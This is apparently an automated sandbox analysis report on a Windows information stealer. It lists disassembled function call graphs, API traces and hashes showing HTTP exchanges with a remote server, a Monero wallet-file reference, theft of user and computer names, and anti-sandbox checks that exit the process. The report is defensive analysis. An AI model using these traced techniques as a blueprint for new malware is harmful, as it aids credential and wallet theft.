                            • GetProcAddress.KERNEL32(75070000,00976560), ref: 00F4A746
                            • GetProcAddress.KERNEL32(75070000,0098C9B8), ref: 00F4A75E
                            • GetProcAddress.KERNEL32(75070000,0098C9E8), ref: 00F4A776
                            • GetProcAddress.KERNEL32(75070000,0098C988), ref: 00F4A78F
                            • GetProcAddress.KERNEL32(75070000,0098CA00), ref: 00F4A7A7
                            • GetProcAddress.KERNEL32(74E50000,00976600), ref: 00F4A7C8
                            • GetProcAddress.KERNEL32(74E50000,00976620), ref: 00F4A7E1
                            • GetProcAddress.KERNEL32(75320000,00976340), ref: 00F4A802
                            • GetProcAddress.KERNEL32(75320000,0098CD18), ref: 00F4A81A
                            • GetProcAddress.KERNEL32(6F060000,00976640), ref: 00F4A840
                            • GetProcAddress.KERNEL32(6F060000,009762A0), ref: 00F4A858
                            • GetProcAddress.KERNEL32(6F060000,00976660), ref: 00F4A870
                            • GetProcAddress.KERNEL32(6F060000,0098CB80), ref: 00F4A889
                            • GetProcAddress.KERNEL32(6F060000,009762C0), ref: 00F4A8A1
                            • GetProcAddress.KERNEL32(6F060000,00976300), ref: 00F4A8B9
                            • GetProcAddress.KERNEL32(6F060000,00976360), ref: 00F4A8D2
                            • GetProcAddress.KERNEL32(6F060000,00976520), ref: 00F4A8EA
                            • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 00F4A901
                            • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 00F4A917
                            • GetProcAddress.KERNEL32(74E00000,0098CAF0), ref: 00F4A939
                            • GetProcAddress.KERNEL32(74E00000,00988B70), ref: 00F4A951
                            • GetProcAddress.KERNEL32(74E00000,0098CBF8), ref: 00F4A969
                            • GetProcAddress.KERNEL32(74E00000,0098CB98), ref: 00F4A982
                            • GetProcAddress.KERNEL32(74DF0000,00976380), ref: 00F4A9A3
                            • GetProcAddress.KERNEL32(6F9C0000,0098CB08), ref: 00F4A9C4
                            • GetProcAddress.KERNEL32(6F9C0000,00976580), ref: 00F4A9DD
                            • GetProcAddress.KERNEL32(6F9C0000,0098CDD8), ref: 00F4A9F5
                            • GetProcAddress.KERNEL32(6F9C0000,0098CB50), ref: 00F4AA0D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: HttpQueryInfoA$InternetSetOptionA
                            • API String ID: 2238633743-1775429166
                            • Opcode ID: b3254377219022c4925d4fab668e7608de255795673d5bc93372c0f9e9cb46d6
                            • Instruction ID: 8d5909555648a962a838175031760cbc89083ec2a924d9e6e7d2c9260a6b4e42
                            • Opcode Fuzzy Hash: b3254377219022c4925d4fab668e7608de255795673d5bc93372c0f9e9cb46d6
                            • Instruction Fuzzy Hash: 86624DB55102009FC376DFA8F88C956BBBAB74D301710871ABA89C329ED775B951CFA0

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 801 f348d0-f34992 call f4aab0 call f34800 call f4aa50 * 5 InternetOpenA StrCmpCA 816 f34994 801->816 817 f3499b-f3499f 801->817 816->817 818 f349a5-f34b1d call f48cf0 call f4ac30 call f4abb0 call f4ab10 * 2 call f4acc0 call f4abb0 call f4ab10 call f4acc0 call f4abb0 call f4ab10 call f4ac30 call f4abb0 call f4ab10 call f4acc0 call f4abb0 call f4ab10 call f4acc0 call f4abb0 call f4ab10 call f4acc0 call f4ac30 call f4abb0 call f4ab10 * 2 InternetConnectA 817->818 819 f34f1b-f34f43 InternetCloseHandle call f4ade0 call f3a210 817->819 818->819 905 f34b23-f34b27 818->905 829 f34f82-f34ff2 call f48b20 * 2 call f4aab0 call f4ab10 * 8 819->829 830 f34f45-f34f7d call f4ab30 call f4acc0 call f4abb0 call f4ab10 819->830 830->829 906 f34b35 905->906 907 f34b29-f34b33 905->907 908 f34b3f-f34b72 HttpOpenRequestA 906->908 907->908 909 f34b78-f34e78 call f4acc0 call f4abb0 call f4ab10 call f4ac30 call f4abb0 call f4ab10 call f4acc0 call f4abb0 call f4ab10 call f4acc0 call f4abb0 call f4ab10 call f4acc0 call f4abb0 call f4ab10 call f4acc0 call f4abb0 call f4ab10 call f4ac30 call f4abb0 call f4ab10 call f4acc0 call f4abb0 call f4ab10 call f4acc0 call f4abb0 call f4ab10 call f4ac30 call f4abb0 call f4ab10 call f4acc0 call f4abb0 call f4ab10 call f4acc0 call f4abb0 call f4ab10 call f4acc0 call f4abb0 call f4ab10 call f4acc0 call f4abb0 call f4ab10 call f4ac30 call f4abb0 call f4ab10 call f4aa50 call f4ac30 * 2 call f4abb0 call f4ab10 * 2 call f4ade0 lstrlen call f4ade0 * 2 lstrlen call f4ade0 HttpSendRequestA 908->909 910 f34f0e-f34f15 InternetCloseHandle 908->910 1021 f34e82-f34eac InternetReadFile 909->1021 910->819 1022 f34eb7-f34f09 InternetCloseHandle call f4ab10 1021->1022 1023 f34eae-f34eb5 1021->1023 1022->910 1023->1022 1024 f34eb9-f34ef7 call f4acc0 call f4abb0 call f4ab10 1023->1024 1024->1021
                            APIs
                              • Part of subcall function 00F4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F4AAF6
                              • Part of subcall function 00F34800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00F34889
                              • Part of subcall function 00F34800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00F34899
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00F34965
                            • StrCmpCA.SHLWAPI(?,0098E540), ref: 00F3498A
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00F34B0A
                            • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00F50DDE,00000000,?,?,00000000,?,",00000000,?,0098E5A0), ref: 00F34E38
                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00F34E54
                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00F34E68
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00F34E99
                            • InternetCloseHandle.WININET(00000000), ref: 00F34EFD
                            • InternetCloseHandle.WININET(00000000), ref: 00F34F15
                            • HttpOpenRequestA.WININET(00000000,0098E440,?,0098DA70,00000000,00000000,00400100,00000000), ref: 00F34B65
                              • Part of subcall function 00F4ACC0: lstrlen.KERNEL32(?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F4ACD5
                              • Part of subcall function 00F4ACC0: lstrcpy.KERNEL32(00000000), ref: 00F4AD14
                              • Part of subcall function 00F4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F4AD22
                              • Part of subcall function 00F4ABB0: lstrcpy.KERNEL32(?,00F50E1A), ref: 00F4AC15
                              • Part of subcall function 00F4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F4AC82
                              • Part of subcall function 00F4AC30: lstrcat.KERNEL32(00000000), ref: 00F4AC92
                            • InternetCloseHandle.WININET(00000000), ref: 00F34F1F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                            • String ID: "$"$------$------$------
                            • API String ID: 460715078-2180234286
                            • Opcode ID: 87aa24ca288904ac184a63912f471e83d1da1df2bccb9b0cda36fbe97a7b756f
                            • Instruction ID: b5348ac6cf12372aae3b2cce8d6bcea0fb610308b1ee429d3552ac801c3b285d
                            • Opcode Fuzzy Hash: 87aa24ca288904ac184a63912f471e83d1da1df2bccb9b0cda36fbe97a7b756f
                            • Instruction Fuzzy Hash: 58120C72950518AAEB15EB90DDA2FEEBB39BF54300F004199F50662492DF387F48DF62

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1090 f45760-f457c7 call f45d20 call f4ab30 * 3 call f4aa50 * 4 1106 f457cc-f457d3 1090->1106 1107 f457d5-f45806 call f4ab30 call f4aab0 call f31590 call f45440 1106->1107 1108 f45827-f4589c call f4aa50 * 2 call f31590 call f45510 call f4abb0 call f4ab10 call f4ade0 StrCmpCA 1106->1108 1123 f4580b-f45822 call f4abb0 call f4ab10 1107->1123 1134 f458e3-f458f9 call f4ade0 StrCmpCA 1108->1134 1138 f4589e-f458de call f4aab0 call f31590 call f45440 call f4abb0 call f4ab10 1108->1138 1123->1134 1139 f45a2c-f45a94 call f4abb0 call f4ab30 * 2 call f316b0 call f4ab10 * 4 call f31670 call f31550 1134->1139 1140 f458ff-f45906 1134->1140 1138->1134 1269 f45d13-f45d16 1139->1269 1142 f4590c-f45913 1140->1142 1143 f45a2a-f45aaf call f4ade0 StrCmpCA 1140->1143 1146 f45915-f45969 call f4ab30 call f4aab0 call f31590 call f45440 call f4abb0 call f4ab10 1142->1146 1147 f4596e-f459e3 call f4aa50 * 2 call f31590 call f45510 call f4abb0 call f4ab10 call f4ade0 StrCmpCA 1142->1147 1162 f45ab5-f45abc 1143->1162 1163 f45be1-f45c49 call f4abb0 call f4ab30 * 2 call f316b0 call f4ab10 * 4 call f31670 call f31550 1143->1163 1146->1143 1147->1143 1245 f459e5-f45a25 call f4aab0 call f31590 call f45440 call f4abb0 call f4ab10 1147->1245 1168 f45ac2-f45ac9 1162->1168 1169 f45bdf-f45c64 call f4ade0 StrCmpCA 1162->1169 1163->1269 1175 f45b23-f45b98 call f4aa50 * 2 call f31590 call f45510 call f4abb0 call f4ab10 call f4ade0 StrCmpCA 1168->1175 1176 f45acb-f45b1e call f4ab30 call f4aab0 call f31590 call f45440 call f4abb0 call f4ab10 1168->1176 1198 f45c66-f45c71 Sleep 1169->1198 1199 f45c78-f45ce1 call f4abb0 call f4ab30 * 2 call f316b0 call f4ab10 * 4 call f31670 call f31550 1169->1199 1175->1169 1274 f45b9a-f45bda call f4aab0 call f31590 call f45440 call f4abb0 call f4ab10 1175->1274 1176->1169 1198->1106 1199->1269 1245->1143 1274->1169
                            APIs
                              • Part of subcall function 00F4AB30: lstrlen.KERNEL32(00F34F55,?,?,00F34F55,00F50DDF), ref: 00F4AB3B
                              • Part of subcall function 00F4AB30: lstrcpy.KERNEL32(00F50DDF,00000000), ref: 00F4AB95
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00F45894
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F458F1
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F45AA7
                              • Part of subcall function 00F4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F4AAF6
                              • Part of subcall function 00F45440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F45478
                              • Part of subcall function 00F4ABB0: lstrcpy.KERNEL32(?,00F50E1A), ref: 00F4AC15
                              • Part of subcall function 00F45510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00F45568
                              • Part of subcall function 00F45510: lstrlen.KERNEL32(00000000), ref: 00F4557F
                              • Part of subcall function 00F45510: StrStrA.SHLWAPI(00000000,00000000), ref: 00F455B4
                              • Part of subcall function 00F45510: lstrlen.KERNEL32(00000000), ref: 00F455D3
                              • Part of subcall function 00F45510: lstrlen.KERNEL32(00000000), ref: 00F455FE
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00F459DB
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00F45B90
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F45C5C
                            • Sleep.KERNEL32(0000EA60), ref: 00F45C6B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen$Sleep
                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                            • API String ID: 507064821-2791005934
                            • Opcode ID: 554c31cd7ec997614c11ce0a296f8d339a9d74ba2b2303ec222a40b72e4e45b3
                            • Instruction ID: 02661dc1c2956947e7e155d49a6e4f1d8da81ac655b558eb9984d5d3a0baeb6c
                            • Opcode Fuzzy Hash: 554c31cd7ec997614c11ce0a296f8d339a9d74ba2b2303ec222a40b72e4e45b3
                            • Instruction Fuzzy Hash: 49E173729505049BDB14FBA0ED67EED7B3DBF94300F408658B90656096EF38AB08EB52

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1301 f419f0-f41a1d call f4ade0 StrCmpCA 1304 f41a27-f41a41 call f4ade0 1301->1304 1305 f41a1f-f41a21 ExitProcess 1301->1305 1309 f41a44-f41a48 1304->1309 1310 f41c12-f41c1d call f4ab10 1309->1310 1311 f41a4e-f41a61 1309->1311 1313 f41a67-f41a6a 1311->1313 1314 f41bee-f41c0d 1311->1314 1316 f41a71-f41a80 call f4ab30 1313->1316 1317 f41afd-f41b0e StrCmpCA 1313->1317 1318 f41b1f-f41b30 StrCmpCA 1313->1318 1319 f41bdf-f41be9 call f4ab30 1313->1319 1320 f41a99-f41aa8 call f4ab30 1313->1320 1321 f41a85-f41a94 call f4ab30 1313->1321 1322 f41bc0-f41bd1 StrCmpCA 1313->1322 1323 f41b41-f41b52 StrCmpCA 1313->1323 1324 f41ba1-f41bb2 StrCmpCA 1313->1324 1325 f41b82-f41b93 StrCmpCA 1313->1325 1326 f41b63-f41b74 StrCmpCA 1313->1326 1327 f41aad-f41abe StrCmpCA 1313->1327 1328 f41acf-f41ae0 StrCmpCA 1313->1328 1314->1309 1316->1314 1334 f41b10-f41b13 1317->1334 1335 f41b1a 1317->1335 1336 f41b32-f41b35 1318->1336 1337 f41b3c 1318->1337 1319->1314 1320->1314 1321->1314 1347 f41bd3-f41bd6 1322->1347 1348 f41bdd 1322->1348 1338 f41b54-f41b57 1323->1338 1339 f41b5e 1323->1339 1344 f41bb4-f41bb7 1324->1344 1345 f41bbe 1324->1345 1342 f41b95-f41b98 1325->1342 1343 f41b9f 1325->1343 1340 f41b76-f41b79 1326->1340 1341 f41b80 1326->1341 1330 f41ac0-f41ac3 1327->1330 1331 f41aca 1327->1331 1332 f41ae2-f41aec 1328->1332 1333 f41aee-f41af1 1328->1333 1330->1331 1331->1314 1353 f41af8 1332->1353 1333->1353 1334->1335 1335->1314 1336->1337 1337->1314 1338->1339 1339->1314 1340->1341 1341->1314 1342->1343 1343->1314 1344->1345 1345->1314 1347->1348 1348->1314 1353->1314
                            APIs
                            • StrCmpCA.SHLWAPI(00000000,block), ref: 00F41A15
                            • ExitProcess.KERNEL32 ref: 00F41A21
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID: block
                            • API String ID: 621844428-2199623458
                            • Opcode ID: 1a48226173daf4551a2f81359dd04b3f8244d667811448e7f4cd9d1f08eb3cc9
                            • Instruction ID: 63aa06d99e1ed929ff200af6a1db04ea4f85914dac20f7e333a9a5a2183fee0a
                            • Opcode Fuzzy Hash: 1a48226173daf4551a2f81359dd04b3f8244d667811448e7f4cd9d1f08eb3cc9
                            • Instruction Fuzzy Hash: D8516F75B04209EFDB14DFA4D944BAE7BB9FF84304F104148ED02AB241EB74E985EB62

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00F49BB0: GetProcAddress.KERNEL32(75900000,00980648), ref: 00F49BF1
                              • Part of subcall function 00F49BB0: GetProcAddress.KERNEL32(75900000,009807F8), ref: 00F49C0A
                              • Part of subcall function 00F49BB0: GetProcAddress.KERNEL32(75900000,009806D8), ref: 00F49C22
                              • Part of subcall function 00F49BB0: GetProcAddress.KERNEL32(75900000,009806F0), ref: 00F49C3A
                              • Part of subcall function 00F49BB0: GetProcAddress.KERNEL32(75900000,00980708), ref: 00F49C53
                              • Part of subcall function 00F49BB0: GetProcAddress.KERNEL32(75900000,00988AF0), ref: 00F49C6B
                              • Part of subcall function 00F49BB0: GetProcAddress.KERNEL32(75900000,00976700), ref: 00F49C83
                              • Part of subcall function 00F49BB0: GetProcAddress.KERNEL32(75900000,00976A20), ref: 00F49C9C
                              • Part of subcall function 00F49BB0: GetProcAddress.KERNEL32(75900000,00980738), ref: 00F49CB4
                              • Part of subcall function 00F49BB0: GetProcAddress.KERNEL32(75900000,00980750), ref: 00F49CCC
                              • Part of subcall function 00F49BB0: GetProcAddress.KERNEL32(75900000,00980768), ref: 00F49CE5
                              • Part of subcall function 00F49BB0: GetProcAddress.KERNEL32(75900000,009807B0), ref: 00F49CFD
                              • Part of subcall function 00F49BB0: GetProcAddress.KERNEL32(75900000,009766A0), ref: 00F49D15
                              • Part of subcall function 00F49BB0: GetProcAddress.KERNEL32(75900000,00980780), ref: 00F49D2E
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                              • Part of subcall function 00F311D0: ExitProcess.KERNEL32 ref: 00F31211
                              • Part of subcall function 00F31160: GetSystemInfo.KERNEL32(?), ref: 00F3116A
                              • Part of subcall function 00F31160: ExitProcess.KERNEL32 ref: 00F3117E
                              • Part of subcall function 00F31110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00F3112B
                              • Part of subcall function 00F31110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00F31132
                              • Part of subcall function 00F31110: ExitProcess.KERNEL32 ref: 00F31143
                              • Part of subcall function 00F31220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00F3123E
                              • Part of subcall function 00F31220: ExitProcess.KERNEL32 ref: 00F31294
                              • Part of subcall function 00F46A10: GetUserDefaultLangID.KERNEL32 ref: 00F46A14
                              • Part of subcall function 00F31190: ExitProcess.KERNEL32 ref: 00F311C6
                              • Part of subcall function 00F479E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00F311B7), ref: 00F47A10
                              • Part of subcall function 00F479E0: RtlAllocateHeap.NTDLL(00000000), ref: 00F47A17
                              • Part of subcall function 00F479E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00F47A2F
                              • Part of subcall function 00F47A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F47AA0
                              • Part of subcall function 00F47A70: RtlAllocateHeap.NTDLL(00000000), ref: 00F47AA7
                              • Part of subcall function 00F47A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00F47ABF
                              • Part of subcall function 00F4ACC0: lstrlen.KERNEL32(?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F4ACD5
                              • Part of subcall function 00F4ACC0: lstrcpy.KERNEL32(00000000), ref: 00F4AD14
                              • Part of subcall function 00F4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F4AD22
                              • Part of subcall function 00F4ABB0: lstrcpy.KERNEL32(?,00F50E1A), ref: 00F4AC15
                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00988A80,?,00F510F4,?,00000000,?,00F510F8,?,00000000,00F50AF3), ref: 00F46D6A
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00F46D88
                            • CloseHandle.KERNEL32(00000000), ref: 00F46D99
                            • Sleep.KERNEL32(00001770), ref: 00F46DA4
                            • CloseHandle.KERNEL32(?,00000000,?,00988A80,?,00F510F4,?,00000000,?,00F510F8,?,00000000,00F50AF3), ref: 00F46DBA
                            • ExitProcess.KERNEL32 ref: 00F46DC2
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                            • String ID:
                            • API String ID: 2931873225-0
                            • Opcode ID: 14bd65fd043bf7d95d3d502f44948830c018be44919f7ffccb1f18cf32d4bff9
                            • Instruction ID: 5930d3bd57fe528b1f5d7d8947d437df1b92f9efb78ded7da69e5b46c0157935
                            • Opcode Fuzzy Hash: 14bd65fd043bf7d95d3d502f44948830c018be44919f7ffccb1f18cf32d4bff9
                            • Instruction Fuzzy Hash: 56310D71E44204ABEB15FBF0DC56BEE7B79BF44340F100918FA12A6182DF78A905E762

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1436 f46d93 1437 f46daa 1436->1437 1439 f46dac-f46dc2 call f46bc0 call f45d60 CloseHandle ExitProcess 1437->1439 1440 f46d5a-f46d77 call f4ade0 OpenEventA 1437->1440 1445 f46d95-f46da4 CloseHandle Sleep 1440->1445 1446 f46d79-f46d91 call f4ade0 CreateEventA 1440->1446 1445->1437 1446->1439
                            APIs
